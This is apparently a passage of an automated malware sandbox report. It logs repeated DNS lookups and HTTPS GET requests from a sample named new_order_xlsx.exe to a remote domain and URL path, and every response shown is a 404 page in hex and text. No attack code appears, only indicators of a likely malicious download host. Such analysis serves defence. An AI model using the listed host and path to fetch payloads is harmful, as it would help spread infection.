                    Sep 4, 2023 16:38:58.924144030 CEST192.168.2.48.8.8.80xfb7bStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Sep 4, 2023 16:36:09.147981882 CEST8.8.8.8192.168.2.40x7289No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:36:18.985531092 CEST8.8.8.8192.168.2.40x591aNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:36:28.931853056 CEST8.8.8.8192.168.2.40x3332No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:36:38.917459011 CEST8.8.8.8192.168.2.40xc500No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:36:49.082881927 CEST8.8.8.8192.168.2.40xc38bNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:36:58.915710926 CEST8.8.8.8192.168.2.40xc3dbNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:08.968136072 CEST8.8.8.8192.168.2.40x70aeNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:18.942511082 CEST8.8.8.8192.168.2.40x50f3No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:30.731101990 CEST8.8.8.8192.168.2.40x15b9No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:38.916171074 CEST8.8.8.8192.168.2.40xca3dNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:49.753021955 CEST8.8.8.8192.168.2.40x917aNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:58.877693892 CEST8.8.8.8192.168.2.40xebfbNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:09.548331976 CEST8.8.8.8192.168.2.40xe282No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:18.906862974 CEST8.8.8.8192.168.2.40x5705No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:28.911595106 CEST8.8.8.8192.168.2.40x95c6No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:38.899369001 CEST8.8.8.8192.168.2.40x4561No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:48.875427961 CEST8.8.8.8192.168.2.40xbc6aNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:58.947972059 CEST8.8.8.8192.168.2.40xfb7bNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • balkancelikdovme.com

                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.449701185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:36:09 UTC0OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:36:09 UTC0INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:36:09 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:36:09 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.449706185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:36:19 UTC1OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:36:19 UTC1INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:36:19 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:36:19 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    10192.168.2.449732185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:37:49 UTC12OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:37:49 UTC13INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:37:49 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:37:49 UTC13INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    11192.168.2.449733185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:37:58 UTC14OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:37:59 UTC14INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:37:59 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:37:59 UTC14INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    12192.168.2.449734185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:38:09 UTC15OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:38:09 UTC15INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:38:09 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:38:09 UTC16INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    13192.168.2.449735185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:38:18 UTC16OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:38:19 UTC16INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:38:19 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:38:19 UTC17INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    14192.168.2.449736185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:38:28 UTC17OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:38:29 UTC18INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:38:29 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:38:29 UTC18INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    15192.168.2.449737185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:38:38 UTC19OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:38:39 UTC19INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:38:39 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:38:39 UTC19INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    16192.168.2.449738185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:38:48 UTC20OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:38:49 UTC20INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:38:48 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:38:49 UTC21INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    17192.168.2.449739185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:38:59 UTC21OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:38:59 UTC22INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:38:59 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:38:59 UTC22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.449723185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:36:29 UTC2OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:36:29 UTC2INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:36:29 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
